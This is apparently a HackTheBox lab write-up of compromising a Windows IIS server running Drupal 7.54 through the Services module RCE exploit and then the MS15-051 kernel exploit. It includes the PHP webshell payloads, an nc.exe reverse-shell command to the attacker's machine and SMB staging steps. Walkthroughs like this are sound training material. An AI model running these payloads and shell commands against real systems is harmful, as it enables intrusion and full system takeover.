A medium box from HackTheBox, use a vulnerability in a Drupal plugin to get initial access, then a kernel exploit for privesc.


Regular nmap

sudo nmap -sC -sV -oA nmap/init
80/tcp    open  http    Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_  Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to |
135/tcp   open  msrpc   Microsoft Windows RPC
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

On port 80 find a Drupal instance, running Drupal 7

Next up, gobuster for directories

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt --url

Dont find anything interesting immediately, but the presence of /rest/ will be important later

Then gobuster for files

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt --url

And find a /changelog.txt on the webroot, exposing that the version of Drupal is 7.54

Running a more specific scan, run droopescan to enumerate the plugins running on the server

droopescan scan drupal -u

This one takes year to complete, but eventually get the output

[+] Themes found:

[+] Possible interesting urls found:
    Default changelog file -
    Default admin -

[+] Possible version(s):

[+] Plugins found:

[+] Scan finished (0:35:53.627982 elapsed)

Then when running searchsploit with drupal, see an exploit involving Drupal 7.x and the services plugin

searchsploit drupal 7


Drupal 7.x Module Services - Remote Code Execution | php/webapps/41564.php



Download the exploit to the current directory

searchsploit -m php/webapps/41564.php

FIring it immediately , it oesn’t work with -h or giving it a target - so read up on it using the writeup link inside the file

At the end of the writeup, the authors write - “…one has to guess or find the endpoint URL, which mitigates the vulnerability a bit”

So inside the file need to change the endpoint variable from “endpoint_path=/rest_endpoint” to the one that we found in the gobuster enumeration - “enpoint_path=/rest”

Since the exploit writes a file to the web root, can change the default php file to a webshell


$file = [
    'filename' => 'dixuSOspsOUU.php',
    'data' => '<?php eval(file_get_contents(\'php://input\')); ?>'


$file = [
    'filename' => 'rev.php',
    'data' => '<?php system($_GET[\'cmd\']); ?>'

Then change the target IP within the file as well

$url = http://IP;

Then fire the exploit with

php 41564.php

Now with the webshell, can use the windows version of netcat, nc.exe, to get reverse shell

Copying nc.exe to the working directory, then using the impacket smbscript to access it from the target via webshell

/opt/impacket/examples/smbserver.py share .

And then use the webshell to get a reverse shell by setting up a netcat listener on port 4444 and going to\\KALI_IP\share\nc.exe -e cmd.exe KALI_IP 4444

To catch the reverse shell and get the user flag

Now on the box, run systeminfo and see that there are no hotfixes applied to the box, so a kernel exploit should be easy

Ill opt to use MS15-051, since its easy and has a executable ready to go off github

Transferring it to the victim via SMB Server again, run it with cmd.exe as the command to run as nt authority\system to get root!

C:\inetpub\drupal-7.54> exploit.exe cmd.exe

C:\inetpub\drupal-7.54> whoami
nt authority\system